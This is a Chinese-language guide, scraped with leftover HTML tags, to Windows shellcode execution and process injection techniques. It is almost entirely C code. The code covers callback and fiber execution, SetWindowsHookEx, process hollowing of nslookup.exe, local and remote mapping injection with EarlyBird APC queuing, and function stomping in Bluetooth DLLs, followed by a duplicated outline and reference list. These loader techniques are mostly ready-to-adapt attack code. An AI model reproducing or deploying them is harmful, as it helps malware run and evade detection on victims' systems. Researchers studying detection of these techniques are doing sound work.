Shellcode执行方式全面指南<\/h1>

1. 基础内存分配与执行<\/h2>

1.1 基本内存操作流程<\/h3>

DWORD dwOldProtection;
<\/span><\/span>LPVOID lpMem =<\/span> VirtualAlloc(NULL, sizeof<\/span>(shellcode), MEM_RESERVE |<\/span> MEM_COMMIT, PAGE_READWRITE);
<\/span><\/span>memcpy(lpMem, shellcode, sizeof<\/span>(shellcode));
<\/span><\/span>VirtualProtect(lpMem, sizeof<\/span>(shellcode), PAGE_EXECUTE_READWRITE, &<\/span>dwOldProtection);
<\/span><\/span><\/code><\/pre>1.2 回调函数执行<\/h3>
通过Windows API的回调机制执行shellcode：<\/p>
EnumThreadWindows(NULL, (WNDENUMPROC)lpMem, NULL);
<\/span><\/span><\/code><\/pre>注意<\/strong>：<\/p>

只能在本地进程中使用<\/li>
更多API参考：AlternativeShellcodeExec<\/a><\/li>
<\/ul>
2. 纤程(Fiber)执行<\/h2>
纤程是用户态的轻量级线程：<\/p>
ConvertThreadToFiber(NULL);
<\/span><\/span>LPVOID lpFiber =<\/span> CreateFiber(sizeof<\/span>(shellcode), (LPFIBER_START_ROUTINE)lpMem, NULL);
<\/span><\/span>SwitchToFiber(lpFiber);
<\/span><\/span><\/code><\/pre>特点：<\/p>

所有纤程平等，无主从关系<\/li>
任一纤程返回将导致程序退出<\/li>
<\/ul>
3. SetWindowHookEx注入<\/h2>
利用Windows消息钩子机制：<\/p>
HHOOK hhk =<\/span> SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)lpMem, NULL, GetCurrentThreadId());
<\/span><\/span>MSG msg;
<\/span><\/span>PostThreadMessage(GetCurrentThreadId(), WM_USER, 0<\/span>, 0<\/span>);
<\/span><\/span>PeekMessage(&<\/span>msg, NULL, 0<\/span>, 0<\/span>, PM_REMOVE);
<\/span><\/span>UnhookWindowsHookEx(hhk);
<\/span><\/span><\/code><\/pre>4. 进程镂空(Process Hollowing)<\/h2>
4.1 基本流程<\/h3>

创建挂起进程：<\/li>
<\/ol>
STARTUPINFO si =<\/span> {sizeof<\/span>(STARTUPINFO)};
<\/span><\/span>PROCESS_INFORMATION pi;
<\/span><\/span>CreateProcess(NULL, _wcsdup(L<\/span>"C:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>nslookup.exe"<\/span>), NULL, NULL, false, CREATE_SUSPENDED, NULL, NULL, &<\/span>si, &<\/span>pi);
<\/span><\/span><\/code><\/pre>
获取线程上下文和映像基址：<\/li>
<\/ol>
CONTEXT context;
<\/span><\/span>context.ContextFlags =<\/span> CONTEXT_ALL;
<\/span><\/span>GetThreadContext(pi.hThread, &<\/span>context);
<\/span><\/span>
<\/span><\/span>\/\/ x64
<\/span><\/span><\/span><\/span>ReadProcessMemory(pi.hProcess, (PVOID)(context.Rdx +<\/span> (sizeof<\/span>(SIZE_T)*<\/span>2<\/span>)), &<\/span>RemoteImageBase, sizeof<\/span>(PVOID), NULL);
<\/span><\/span>
<\/span><\/span>\/\/ x86
<\/span><\/span><\/span><\/span>ReadProcessMemory(pi.hProcess, (PVOID)(context.Ebx +<\/span> 8<\/span>), &<\/span>RemoteImageBase, sizeof<\/span>(PVOID), NULL);
<\/span><\/span><\/code><\/pre>
镂空原进程：<\/li>
<\/ol>
if<\/span> ((SIZE_T)RemoteImageBase ==<\/span> pNtHeaders-><\/span>OptionalHeader.ImageBase) {
<\/span><\/span>    NtUnmapViewOfSection(pi.hProcess, RemoteImageBase);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
写入新PE文件：<\/li>
<\/ol>
LPVOID lpMem =<\/span> VirtualAllocEx(pi.hProcess, (PVOID)pNtHeaders-><\/span>OptionalHeader.ImageBase, 
<\/span><\/span>                             pNtHeaders-><\/span>OptionalHeader.SizeOfImage, MEM_COMMIT |<\/span> MEM_RESERVE, PAGE_READWRITE);
<\/span><\/span><\/code><\/pre>
修改入口点并恢复线程：<\/li>
<\/ol>
\/\/ x64
<\/span><\/span><\/span><\/span>context.Rcx =<\/span> (SIZE_T)((LPBYTE)lpMem +<\/span> pNtHeaders-><\/span>OptionalHeader.AddressOfEntryPoint);
<\/span><\/span>
<\/span><\/span>\/\/ x86
<\/span><\/span><\/span><\/span>context.Eax =<\/span> (SIZE_T)((LPBYTE)lpMem +<\/span> pNtHeaders-><\/span>OptionalHeader.AddressOfEntryPoint);
<\/span><\/span>
<\/span><\/span>SetThreadContext(pi.hThread, &<\/span>context);
<\/span><\/span>ResumeThread(pi.hThread);
<\/span><\/span><\/code><\/pre>5. 映射注入(Mapping Injection)<\/h2>
5.1 本地映射注入<\/h3>
HANDLE hMapping =<\/span> CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 
<\/span><\/span>                                   NULL, sizeof<\/span>(shellcode), NULL);
<\/span><\/span>LPVOID lpMem =<\/span> MapViewOfFile(hMapping, FILE_MAP_WRITE |<\/span> FILE_MAP_EXECUTE, 
<\/span><\/span>                            NULL, NULL, sizeof<\/span>(shellcode));
<\/span><\/span>memcpy(lpMem, shellcode, sizeof<\/span>(shellcode));
<\/span><\/span>EnumThreadWindows(NULL, (WNDENUMPROC)lpMem, NULL);
<\/span><\/span><\/code><\/pre>5.2 远程映射注入<\/h3>
CreateProcess(NULL, _wcsdup(L<\/span>"C:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>nslookup.exe"<\/span>), NULL, NULL, false, NULL, NULL, NULL, &<\/span>si, &<\/span>pi);
<\/span><\/span>HANDLE hProcess =<\/span> OpenProcess(PROCESS_VM_OPERATION, false, pi.dwProcessId);
<\/span><\/span>LPVOID addr =<\/span> MapViewOfFile2(hMapping, hProcess, NULL, NULL, NULL, NULL, PAGE_EXECUTE_READWRITE);
<\/span><\/span>CreateRemoteThread(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)addr, NULL, NULL, NULL);
<\/span><\/span><\/code><\/pre>5.3 映射注入联动EarlyBird<\/h3>
CreateProcess(NULL, _wcsdup(L<\/span>"C:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>nslookup.exe"<\/span>), NULL, NULL, false, CREATE_SUSPENDED, NULL, NULL, &<\/span>si, &<\/span>pi);
<\/span><\/span>QueueUserAPC((PAPCFUNC)addr, pi.hThread, 0<\/span>);
<\/span><\/span>ResumeThread(pi.hThread);
<\/span><\/span><\/code><\/pre>6. 函数篡改注入(Function Stomping Injection)<\/h2>
6.1 本地注入<\/h3>
LPVOID sacrificedAddr =<\/span> GetProcAddress(LoadLibrary(L<\/span>"bthprops.cpl"<\/span>), "BluetoothFindDeviceClose"<\/span>);
<\/span><\/span>VirtualProtect(sacrificedAddr, sizeof<\/span>(shellcode), PAGE_READWRITE, &<\/span>dwOldProtection);
<\/span><\/span>memcpy(sacrificedAddr, shellcode, sizeof<\/span>(shellcode));
<\/span><\/span>VirtualProtect(sacrificedAddr, sizeof<\/span>(shellcode), PAGE_EXECUTE_READWRITE, &<\/span>dwOldProtection);
<\/span><\/span>
<\/span><\/span>typedef<\/span> void<\/span> (*<\/span>BluetoothFindDeviceClose)();
<\/span><\/span>BluetoothFindDeviceClose pFunc =<\/span> (BluetoothFindDeviceClose)sacrificedAddr;
<\/span><\/span>pFunc();
<\/span><\/span><\/code><\/pre>6.2 静态库方式<\/h3>
#include<\/span> <bluetoothapis.h><\/span>
<\/span><\/span><\/span>#pragma comment(lib,"Bthprops.lib")
<\/span><\/span><\/span><\/span>
<\/span><\/span>LPVOID sacrificedAddr =<\/span> &<\/span>BluetoothFindDeviceClose;
<\/span><\/span>\/\/ 后续操作同上
<\/span><\/span><\/span><\/code><\/pre>6.3 远程注入<\/h3>

创建挂起进程并加载目标DLL：<\/li>
<\/ol>
TCHAR*<\/span> szDllPath =<\/span> _wcsdup(L<\/span>"BluetoothApis.dll"<\/span>);
<\/span><\/span>LPVOID lpDllPath =<\/span> VirtualAllocEx(pi.hProcess, NULL, _tcslen(szDllPath)*<\/span>sizeof<\/span>(TCHAR)+<\/span>sizeof<\/span>(TCHAR), 
<\/span><\/span>                                 MEM_COMMIT |<\/span> MEM_RESERVE, PAGE_READWRITE);
<\/span><\/span>NtWriteVirtualMemory(pi.hProcess, lpDllPath, szDllPath, _tcslen(szDllPath)*<\/span>sizeof<\/span>(TCHAR)+<\/span>sizeof<\/span>(TCHAR), NULL);
<\/span><\/span>
<\/span><\/span>LPVOID lpLoadLibrary =<\/span> (LPVOID)GetProcAddress(LoadLibraryW(L<\/span>"kernel32.dll"<\/span>), "LoadLibraryW"<\/span>);
<\/span><\/span>CreateRemoteThread(pi.hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)lpLoadLibrary, lpDllPath, NULL, NULL);
<\/span><\/span>ResumeThread(pi.hThread);
<\/span><\/span><\/code><\/pre>
篡改目标函数：<\/li>
<\/ol>
LPVOID sacrificedAddr =<\/span> GetProcAddress(LoadLibrary(L<\/span>"BluetoothApis.dll"<\/span>), "BluetoothFindDeviceClose"<\/span>);
<\/span><\/span>VirtualProtectEx(pi.hProcess, sacrificedAddr, sizeof<\/span>(shellcode), PAGE_READWRITE, &<\/span>dwOldProtection);
<\/span><\/span>NtWriteVirtualMemory(pi.hProcess, sacrificedAddr, shellcode, sizeof<\/span>(shellcode), &<\/span>byteWritten);
<\/span><\/span>VirtualProtectEx(pi.hProcess, sacrificedAddr, sizeof<\/span>(shellcode), PAGE_EXECUTE_READWRITE, &<\/span>dwOldProtection);
<\/span><\/span>
<\/span><\/span>HANDLE hThread =<\/span> CreateRemoteThread(pi.hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)sacrificedAddr, NULL, NULL, NULL);
<\/span><\/span>WaitForSingleObject(hThread, -<\/span>1<\/span>);
<\/span><\/span><\/code><\/pre>注意<\/strong>：确保目标DLL已加载到远程进程，且函数地址正确。<\/p>
7. 参考资源<\/h2>

Malicious Memory Artifacts - DLL Hollowing<\/a><\/li>
Module Stomping\/DLL Hollowing<\/a><\/li>
Process Hollowing Implementation<\/a><\/li>
Process Hollowing and PE Relocations<\/a><\/li>
进程镂空技术详解<\/a><\/li>
<\/ol>

Shellcode执行方式全面指南<\/h1>

1. 基础内存分配与执行<\/h2>

2. 纤程(Fiber)执行<\/h2> 纤程是用户态的轻量级线程：<\/p>

3. SetWindowHookEx注入<\/h2> 利用Windows消息钩子机制：<\/p>

4. 进程镂空(Process Hollowing)<\/h2>

5. 映射注入(Mapping Injection)<\/h2>

6. 函数篡改注入(Function Stomping Injection)<\/h2>

7. 参考资源<\/h2> Malicious Memory Artifacts - DLL Hollowing<\/a><\/li> Module Stomping\/DLL Hollowing<\/a><\/li> Process Hollowing Implementation<\/a><\/li> Process Hollowing and PE Relocations<\/a><\/li> 进程镂空技术详解<\/a><\/li> <\/ol>

7. 参考资源<\/h2>

Malicious Memory Artifacts - DLL Hollowing<\/a><\/li>
Module Stomping\/DLL Hollowing<\/a><\/li>
Process Hollowing Implementation<\/a><\/li>
Process Hollowing and PE Relocations<\/a><\/li>
进程镂空技术详解<\/a><\/li> <\/ol>